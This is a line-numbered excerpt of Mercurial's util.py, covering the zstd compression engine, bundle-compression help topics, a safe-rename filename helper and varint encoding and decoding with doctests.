3774 3774 def available(self):
3775 3775 return bool(self._module)
3776 3776
3777 3777 def bundletype(self):
3778 3778 """A modern compression algorithm that is fast and highly flexible.
3779 3779
3780 3780 Only supported by Mercurial 4.1 and newer clients.
3781 3781
3782 3782 With the default settings, zstd compression is both faster and yields
3783 3783 better compression than ``gzip``. It also frequently yields better
3784 3784 compression than ``bzip2`` while operating at much higher speeds.
3785 3785
3786 3786 If this engine is available and backwards compatibility is not a
3787 3787 concern, it is likely the best available engine.
3788 3788 """
3789 3789 return 'zstd', 'ZS'
3790 3790
3791 3791 def wireprotosupport(self):
3792 3792 return compewireprotosupport('zstd', 50, 50)
3793 3793
3794 3794 def revlogheader(self):
3795 3795 return '\x28'
3796 3796
3797 3797 def compressstream(self, it, opts=None):
3798 3798 opts = opts or {}
3799 3799 # zstd level 3 is almost always significantly faster than zlib
3800 3800 # while providing no worse compression. It strikes a good balance
3801 3801 # between speed and compression.
3802 3802 level = opts.get('level', 3)
3803 3803
3804 3804 zstd = self._module
3805 3805 z = zstd.ZstdCompressor(level=level).compressobj()
3806 3806 for chunk in it:
3807 3807 data = z.compress(chunk)
3808 3808 if data:
3809 3809 yield data
3810 3810
3811 3811 yield z.flush()
3812 3812
3813 3813 def decompressorreader(self, fh):
3814 3814 return _ZstdCompressedStreamReader(fh, self._module)
3815 3815
3816 3816 class zstdrevlogcompressor(object):
3817 3817 def __init__(self, zstd, level=3):
3818 3818 # TODO consider omitting frame magic to save 4 bytes.
3819 3819 # This writes content sizes into the frame header. That is
3820 3820 # extra storage. But it allows a correct size memory allocation
3821 3821 # to hold the result.
3822 3822 self._cctx = zstd.ZstdCompressor(level=level)
3823 3823 self._dctx = zstd.ZstdDecompressor()
3824 3824 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3825 3825 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3826 3826
3827 3827 def compress(self, data):
3828 3828 insize = len(data)
3829 3829 # Caller handles empty input case.
3830 3830 assert insize > 0
3831 3831
3832 3832 if insize < 50:
3833 3833 return None
3834 3834
3835 3835 elif insize <= 1000000:
3836 3836 compressed = self._cctx.compress(data)
3837 3837 if len(compressed) < insize:
3838 3838 return compressed
3839 3839 return None
3840 3840 else:
3841 3841 z = self._cctx.compressobj()
3842 3842 chunks = []
3843 3843 pos = 0
3844 3844 while pos < insize:
3845 3845 pos2 = pos + self._compinsize
3846 3846 chunk = z.compress(data[pos:pos2])
3847 3847 if chunk:
3848 3848 chunks.append(chunk)
3849 3849 pos = pos2
3850 3850 chunks.append(z.flush())
3851 3851
3852 3852 if sum(map(len, chunks)) < insize:
3853 3853 return ''.join(chunks)
3854 3854 return None
3855 3855
3856 3856 def decompress(self, data):
3857 3857 insize = len(data)
3858 3858
3859 3859 try:
3860 3860 # This was measured to be faster than other streaming
3861 3861 # decompressors.
3862 3862 dobj = self._dctx.decompressobj()
3863 3863 chunks = []
3864 3864 pos = 0
3865 3865 while pos < insize:
3866 3866 pos2 = pos + self._decompinsize
3867 3867 chunk = dobj.decompress(data[pos:pos2])
3868 3868 if chunk:
3869 3869 chunks.append(chunk)
3870 3870 pos = pos2
3871 3871 # Frame should be exhausted, so no finish() API.
3872 3872
3873 3873 return ''.join(chunks)
3874 3874 except Exception as e:
3875 3875 raise error.StorageError(_('revlog decompress error: %s') %
3876 3876 stringutil.forcebytestr(e))
3877 3877
3878 3878 def revlogcompressor(self, opts=None):
3879 3879 opts = opts or {}
3880 3880 return self.zstdrevlogcompressor(self._module,
3881 3881 level=opts.get('level', 3))
3882 3882
3883 3883 compengines.register(_zstdengine())
3884 3884
3885 3885 def bundlecompressiontopics():
3886 3886 """Obtains a list of available bundle compressions for use in help."""
3887 3887 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3888 3888 items = {}
3889 3889
3890 3890 # We need to format the docstring. So use a dummy object/type to hold it
3891 3891 # rather than mutating the original.
3892 3892 class docobject(object):
3893 3893 pass
3894 3894
3895 3895 for name in compengines:
3896 3896 engine = compengines[name]
3897 3897
3898 3898 if not engine.available():
3899 3899 continue
3900 3900
3901 3901 bt = engine.bundletype()
3902 3902 if not bt or not bt[0]:
3903 3903 continue
3904 3904
3905 3905 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3906 3906
3907 3907 value = docobject()
3908 3908 value.__doc__ = pycompat.sysstr(doc)
3909 3909 value._origdoc = engine.bundletype.__doc__
3910 3910 value._origfunc = engine.bundletype
3911 3911
3912 3912 items[bt[0]] = value
3913 3913
3914 3914 return items
3915 3915
3916 3916 i18nfunctions = bundlecompressiontopics().values()
3917 3917
3918 3918 # convenient shortcut
3919 3919 dst = debugstacktrace
3920 3920
3921 3921 def safename(f, tag, ctx, others=None):
3922 3922 """
3923 3923 Generate a name that it is safe to rename f to in the given context.
3924 3924
3925 3925 f: filename to rename
3926 3926 tag: a string tag that will be included in the new name
3927 3927 ctx: a context, in which the new name must not exist
3928 3928 others: a set of other filenames that the new name must not be in
3929 3929
3930 3930 Returns a file name of the form oldname~tag[~number] which does not exist
3931 3931 in the provided context and is not in the set of other names.
3932 3932 """
3933 3933 if others is None:
3934 3934 others = set()
3935 3935
3936 3936 fn = '%s~%s' % (f, tag)
3937 3937 if fn not in ctx and fn not in others:
3938 3938 return fn
3939 3939 for n in itertools.count(1):
3940 3940 fn = '%s~%s~%s' % (f, tag, n)
3941 3941 if fn not in ctx and fn not in others:
3942 3942 return fn
3943 3943
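# Illustrative sketch (not part of upstream util.py): a plain set stands in
# for the changectx that 'ctx' normally is, since only membership tests are
# performed on it.
def _safename_example():
    assert safename('file.txt', 'orig', ctx=set()) == 'file.txt~orig'
    # When the first candidate is taken, numbered suffixes are tried in order.
    assert safename('file.txt', 'orig', ctx={'file.txt~orig'}) == 'file.txt~orig~1'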
3944 3944 def readexactly(stream, n):
3945 3945 '''read n bytes from stream.read and abort if less was available'''
3946 3946 s = stream.read(n)
3947 3947 if len(s) < n:
3948 3948 raise error.Abort(_("stream ended unexpectedly"
3949 3949 " (got %d bytes, expected %d)")
3950 3950 % (len(s), n))
3951 3951 return s
3952 3952
3953 3953 def uvarintencode(value):
3954 3954 """Encode an unsigned integer value to a varint.
3955 3955
3956 3956 A varint is a variable length integer of 1 or more bytes. Each byte
3957 3957 except the last has the most significant bit set. The lower 7 bits of
3958 3958 each byte store the 2's complement representation, least significant group
3959 3959 first.
3960 3960
3961 3961 >>> uvarintencode(0)
3962 3962 '\\x00'
3963 3963 >>> uvarintencode(1)
3964 3964 '\\x01'
3965 3965 >>> uvarintencode(127)
3966 3966 '\\x7f'
3967 3967 >>> uvarintencode(1337)
3968 3968 '\\xb9\\n'
3969 3969 >>> uvarintencode(65536)
3970 3970 '\\x80\\x80\\x04'
3971 3971 >>> uvarintencode(-1)
3972 3972 Traceback (most recent call last):
3973 3973 ...
3974 3974 ProgrammingError: negative value for uvarint: -1
3975 3975 """
3976 3976 if value < 0:
3977 3977 raise error.ProgrammingError('negative value for uvarint: %d'
3978 3978 % value)
3979 3979 bits = value & 0x7f
3980 3980 value >>= 7
3981 3981 bytes = []
3982 3982 while value:
3983 3983 bytes.append(pycompat.bytechr(0x80 | bits))
3984 3984 bits = value & 0x7f
3985 3985 value >>= 7
3986 3986 bytes.append(pycompat.bytechr(bits))
3987 3987
3988 3988 return ''.join(bytes)
3989 3989
3990 3990 def uvarintdecodestream(fh):
3991 3991 """Decode an unsigned variable length integer from a stream.
3992 3992
3993 3993 The passed argument is anything that has a ``.read(N)`` method.
3994 3994
3995 3995 >>> try:
3996 3996 ... from StringIO import StringIO as BytesIO
3997 3997 ... except ImportError:
3998 3998 ... from io import BytesIO
3999 3999 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4000 4000 0
4001 4001 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4002 4002 1
4003 4003 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4004 4004 127
4005 4005 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4006 4006 1337
4007 4007 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4008 4008 65536
4009 4009 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4010 4010 Traceback (most recent call last):
4011 4011 ...
4012 4012 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4013 4013 """
4014 4014 result = 0
4015 4015 shift = 0
4016 4016 while True:
4017 4017 byte = ord(readexactly(fh, 1))
4018 4018 result |= ((byte & 0x7f) << shift)
4019 4019 if not (byte & 0x80):
4020 4020 return result
4021 4021 shift += 7